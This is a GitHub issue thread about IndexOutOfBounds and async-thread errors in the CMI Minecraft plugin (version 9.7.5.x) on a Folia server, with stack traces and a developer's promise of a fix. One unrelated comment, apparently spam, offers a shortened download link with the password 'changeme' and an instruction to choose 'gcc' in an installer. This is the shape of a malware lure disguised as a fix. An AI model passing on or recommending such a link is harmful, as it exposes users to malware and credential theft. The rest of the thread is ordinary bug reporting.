### ISSUE TITLE
Error in console

### ISSUE THREAD

**Issue by asygames** [Zrips/CMI#9090]
### Description of Issue

When we are using editctext we get some errors in console

### Version Information

```shell
[16:28:52 INFO]: CMI: 9.7.5.5 SqLite-> 9.7.5.4
[16:28:52 INFO]: CMILib: 1.5.1.1 
[16:28:52 INFO]: Server: Folia(5) 1.20.6-R0.1-SNAPSHOT-
[16:28:52 INFO]: CMI economy: Enabled Vault: 1.7.3-CMI(CMIEInjector) CMI Chat: Enabled 
[16:28:52 INFO]: Modules -> 63 enabled 3 disabled: chatBubble, tablist, votifier
```

### Errors

```shell
[16:26:31 ERROR]: Command exception: /cmi editctext
org.bukkit.command.CommandException: Unhandled exception executing command 'cmi' in plugin CMI v9.7.5.5
        at org.bukkit.command.PluginCommand.execute(PluginCommand.java:47) ~[folia-api-1.20.6-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.command.brigadier.bukkit.BukkitCommandNode$BukkitBrigCommand.run(BukkitCommandNode.java:91) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at com.mojang.brigadier.context.ContextChain.runExecutable(ContextChain.java:73) ~[brigadier-1.2.9.jar:?]
        at net.minecraft.commands.execution.tasks.ExecuteCommand.execute(ExecuteCommand.java:31) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.execution.tasks.ExecuteCommand.execute(ExecuteCommand.java:19) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.execution.UnboundEntryAction.lambda$bind$0(UnboundEntryAction.java:8) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.execution.CommandQueueEntry.execute(CommandQueueEntry.java:5) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.execution.ExecutionContext.runCommandQueue(ExecutionContext.java:103) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.Commands.executeCommandInContext(Commands.java:448) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.Commands.performCommand(Commands.java:355) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.Commands.performCommand(Commands.java:342) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.commands.Commands.performCommand(Commands.java:337) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.server.network.ServerGamePacketListenerImpl.performUnsignedChatCommand(ServerGamePacketListenerImpl.java:2254) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.server.network.ServerGamePacketListenerImpl.lambda$handleChatCommand$14(ServerGamePacketListenerImpl.java:2228) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.server.network.ServerGamePacketListenerImpl.lambda$tryHandleChat$17(ServerGamePacketListenerImpl.java:2392) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at io.papermc.paper.threadedregions.EntityScheduler.executeTick(EntityScheduler.java:173) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at net.minecraft.server.MinecraftServer.tickServer(MinecraftServer.java:1688) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at io.papermc.paper.threadedregions.TickRegions$ConcreteRegionTickHandle.tickRegion(TickRegions.java:407) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at io.papermc.paper.threadedregions.TickRegionScheduler$RegionScheduleHandle.runTick(TickRegionScheduler.java:404) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at ca.spottedleaf.concurrentutil.scheduler.SchedulerThreadPool$TickThreadRunner.run(SchedulerThreadPool.java:525) ~[folia-1.20.6.jar:1.20.6-5-d797082]
        at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]
Caused by: java.lang.IndexOutOfBoundsException: Index 0 out of bounds for length 0
        at java.base/jdk.internal.util.Preconditions.outOfBounds(Preconditions.java:100) ~[?:?]
        at java.base/jdk.internal.util.Preconditions.outOfBoundsCheckIndex(Preconditions.java:106) ~[?:?]
        at java.base/jdk.internal.util.Preconditions.checkIndex(Preconditions.java:302) ~[?:?]
        at java.base/java.util.Objects.checkIndex(Objects.java:385) ~[?:?]
        at java.base/java.util.ArrayList.get(ArrayList.java:427) ~[?:?]
        at CMI-9.7.5.5.jar/com.Zrips.CMI.commands.list.editctext.perform(editctext.java:110) ~[CMI-9.7.5.5.jar:?]
        at CMI-9.7.5.5.jar/com.Zrips.CMI.commands.CommandsHandler.onCommand(CommandsHandler.java:400) ~[CMI-9.7.5.5.jar:?]
        at org.bukkit.command.PluginCommand.execute(PluginCommand.java:45) ~[folia-api-1.20.6-R0.1-SNAPSHOT.jar:?]
        ... 20 more
```

### Agreements

- [X] My server is supported by CMI.
- [X] My version of CMI at the time of this report is up to date.
- [X] I have searched the github and asked around before making this report.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Tudorhc5** [comment]
Hello, providing more errors from the same server, @asygames will confirm im a collaborator.
```
! [Tue 22:05:34 WARN  CMILib] Global task for CMILib v1.5.1.1 generated an exception
org.bukkit.command.CommandException: Unhandled exception executing command 'cmi' in plugin CMI v9.7.5.5
    at org.bukkit.command.PluginCommand.execute(PluginCommand.java:47)
    at org.bukkit.command.SimpleCommandMap.dispatch(SimpleCommandMap.java:165)
    at org.bukkit.craftbukkit.CraftServer.dispatchCommand(CraftServer.java:1029)
    at org.bukkit.Bukkit.dispatchCommand(Bukkit.java:1099)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.dispatch(SpecializedCommandManager.java:1205)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.executeCmd(SpecializedCommandManager.java:1104)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.process(SpecializedCommandManager.java:418)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.processCmds(SpecializedCommandManager.java:324)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.processCmds(SpecializedCommandManager.java:274)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.Portals.CMIPortal.lambda$1(CMIPortal.java:123)
    at CMILib1.5.1.1.jar//net.Zrips.CMILib.Version.Schedulers.CMIFoliaImpl.lambda$runTask$0(CMIFoliaImpl.java:42)
    at io.papermc.paper.threadedregions.scheduler.FoliaGlobalRegionScheduler.lambda$execute$0(FoliaGlobalRegionScheduler.java:47)
    at io.papermc.paper.threadedregions.scheduler.FoliaGlobalRegionScheduler$GlobalScheduledTask.run(FoliaGlobalRegionScheduler.java:179)
    at io.papermc.paper.threadedregions.scheduler.FoliaGlobalRegionScheduler.tick(FoliaGlobalRegionScheduler.java:37)
    at io.papermc.paper.threadedregions.RegionizedServer.globalTick(RegionizedServer.java:293)
    at io.papermc.paper.threadedregions.RegionizedServer$GlobalTickTickHandle.tickRegion(RegionizedServer.java:148)
    at io.papermc.paper.threadedregions.TickRegionSchedu
```

This is repeating really often, and repeatedly (up to 7 times in a row)
```
- [Tue 22:05:34 ERROR Server] Thread Region Scheduler Thread #1 failed main thread check: Cannot add effects to entities asynchronously
java.lang.Throwable
    at io.papermc.paper.util.TickThread.ensureTickThread(TickThread.java:78)
    at net.minecraft.world.entity.LivingEntity.addEffect(LivingEntity.java:1191)
    at net.minecraft.world.entity.LivingEntity.addEffect(LivingEntity.java:1186)
    at net.minecraft.world.entity.LivingEntity.addEffect(LivingEntity.java:1177)
    at org.bukkit.craftbukkit.entity.CraftLivingEntity.addPotionEffect(CraftLivingEntity.java:535)
    at org.bukkit.craftbukkit.entity.CraftLivingEntity.addPotionEffect(CraftLivingEntity.java:529)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.commands.list.effect.perform(effect.java:308)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.commands.CommandsHandler.onCommand(CommandsHandler.java:400)
    at org.bukkit.command.PluginCommand.execute(PluginCommand.java:45)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.dispatch(SpecializedCommandManager.java:1203)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.executeCmd(SpecializedCommandManager.java:1104)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.process(SpecializedCommandManager.java:418)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.processCmds(SpecializedCommandManager.java:324)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.SpecializedCommands.SpecializedCommandManager.processCmds(SpecializedCommandManager.java:274)
    at CMI-9.7.5.5.jar//com.Zrips.CMI.Modules.Portals.CMIPortal.lambda$1(CMIPortal.java:123)
    at CMILib1.5.1.1.jar//net.Zrips.CMILib.Version.Schedulers.CMIFoliaImpl.lambda$runTask$0(CMIFoliaImpl.java:42)
    at io.papermc.paper.threadedregions.scheduler.FoliaGlobalRegionScheduler.lambda$execute$0(FoliaGlobalRegionScheduler.java:47)
    at io.papermc.paper.threadedregions.scheduler.FoliaGlobalRegionScheduler$
    ```

**Comment by asygames** [comment]
<html><body>

  | [20:17:58] [Region Scheduler Thread #0/ERROR]: Could not pass event PlayerJoinEvent to CMI v9.7.5.7
-- | --
 

<span class="level level-error multiline">	at java.base/java.lang.Thread.run(Thread.java:1583) ~[?:?]</span>
</body>
</html>

This is what I get now after updating cmi to version 9.7.5.7

**Comment by Zrips** [comment]
All errors should be fixed with next update
